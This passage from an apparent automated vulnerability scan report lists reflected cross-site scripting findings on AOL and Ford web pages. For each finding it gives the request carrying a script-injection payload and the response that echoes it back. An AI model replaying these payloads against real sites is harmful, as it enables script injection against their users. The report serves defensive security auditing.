This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?8bae9"><script>alert(1)</script>7fff34b5499=1 HTTP/1.1
Host: body.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:46:31 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=3d4d68ffc3f32e790c7f04472469d3d5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 51717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/?8bae9"><script>alert(1)</script>7fff34b5499=1">
...[SNIP]...

2.203. http://bp2.forddirect.fordvehicles.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 324ee'-alert(1)-'c494a2929e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?324ee'-alert(1)-'c494a2929e3=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Ford Vehicle Showroom</title>


<script type="text/javascript">
//<![CDATA[
...[SNIP]...
icitly on DOMReady
var pageRefreshed = false;

var clubWTKWidgets = true;
var urlParamMap = {
'document_referrer':document.referrer,'makeTransition':unescape('config'),'Skin':'Mustang','FVS':false,'324ee'-alert(1)-'c494a2929e3':'1'
,'makeTransition':'config'
};

if(typeof urlParamMap.httpReferer != "undefined"){
urlParamMap.httpReferer = escape(urlParamMap.httpReferer);
}
if(typeof urlParamMap.referrerURL != "undefined"
...[SNIP]...

2.204. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-Explorer/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b53'-alert(1)-'ed4a6a7d812 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-Explorer/ChooseYourPath/?branding=1c0b53'-alert(1)-'ed4a6a7d812&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1c0b53'-alert(1)-'ed4a6a7d812',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Explorer',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.205. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-Explorer/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3f14'-alert(1)-'acb6bb024e was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-Explorer/ChooseYourPath/?branding=1&referringSite=1&lang=ena3f14'-alert(1)-'acb6bb024e HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121886

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'ena3f14'-alert(1)-'acb6bb024e',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Explorer',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = tru
...[SNIP]...

2.206. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-Explorer/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cbf5'-alert(1)-'eb57e9c7bdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-Explorer/ChooseYourPath/?1cbf5'-alert(1)-'eb57e9c7bdd=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:52:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'1cbf5'-alert(1)-'eb57e9c7bdd':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Explorer',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.207. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-Explorer/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b275b'-alert(1)-'66caefdd685 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-Explorer/ChooseYourPath/?branding=1&referringSite=1b275b'-alert(1)-'66caefdd685&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1b275b'-alert(1)-'66caefdd685',
'Skin':'Generic',
'Model':'Explorer',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.208. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-ExplorerSportTrac/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3293e'-alert(1)-'f7c561f3ae6 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-ExplorerSportTrac/ChooseYourPath/?branding=13293e'-alert(1)-'f7c561f3ae6&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'13293e'-alert(1)-'f7c561f3ae6',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Sport_Trac',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</scrip
...[SNIP]...

2.209. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-ExplorerSportTrac/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c05dd'-alert(1)-'fd6c5a73f55 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-ExplorerSportTrac/ChooseYourPath/?branding=1&referringSite=1&lang=enc05dd'-alert(1)-'fd6c5a73f55 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'enc05dd'-alert(1)-'fd6c5a73f55',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Sport_Trac',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = t
...[SNIP]...

2.210. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-ExplorerSportTrac/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a69d'-alert(1)-'552de361f44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-ExplorerSportTrac/ChooseYourPath/?4a69d'-alert(1)-'552de361f44=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:52:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'4a69d'-alert(1)-'552de361f44':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Sport_Trac',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.211. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-ExplorerSportTrac/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cff3e'-alert(1)-'c36abcd05f6 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-ExplorerSportTrac/ChooseYourPath/?branding=1&referringSite=1cff3e'-alert(1)-'c36abcd05f6&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1cff3e'-alert(1)-'c36abcd05f6',
'Skin':'Generic',
'Model':'Sport_Trac',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.212. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-FocusCoupe/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bf31'-alert(1)-'e56a580c459 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-FocusCoupe/ChooseYourPath/?branding=11bf31'-alert(1)-'e56a580c459&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'11bf31'-alert(1)-'e56a580c459',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'FocusCoupe',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</scrip
...[SNIP]...

2.213. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-FocusCoupe/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcabb'-alert(1)-'bbf9762f6d5 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-FocusCoupe/ChooseYourPath/?branding=1&referringSite=1&lang=endcabb'-alert(1)-'bbf9762f6d5 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'endcabb'-alert(1)-'bbf9762f6d5',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'FocusCoupe',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = t
...[SNIP]...

2.214. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-FocusCoupe/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19821'-alert(1)-'01b8f992be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-FocusCoupe/ChooseYourPath/?19821'-alert(1)-'01b8f992be7=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'19821'-alert(1)-'01b8f992be7':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'FocusCoupe',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.215. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2010-Ford-FocusCoupe/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc075'-alert(1)-'e7594b476f7 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-Ford-FocusCoupe/ChooseYourPath/?branding=1&referringSite=1cc075'-alert(1)-'e7594b476f7&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1cc075'-alert(1)-'e7594b476f7',
'Skin':'Generic',
'Model':'FocusCoupe',
'Year':'2010'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.216. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-EconolineWagon/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28e21'-alert(1)-'7807923c0ad was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-EconolineWagon/ChooseYourPath/?branding=128e21'-alert(1)-'7807923c0ad&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'128e21'-alert(1)-'7807923c0ad',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'EconolineWagon',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</s
...[SNIP]...

2.217. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-EconolineWagon/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73c47'-alert(1)-'03a1a9968b was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-EconolineWagon/ChooseYourPath/?branding=1&referringSite=1&lang=en73c47'-alert(1)-'03a1a9968b HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

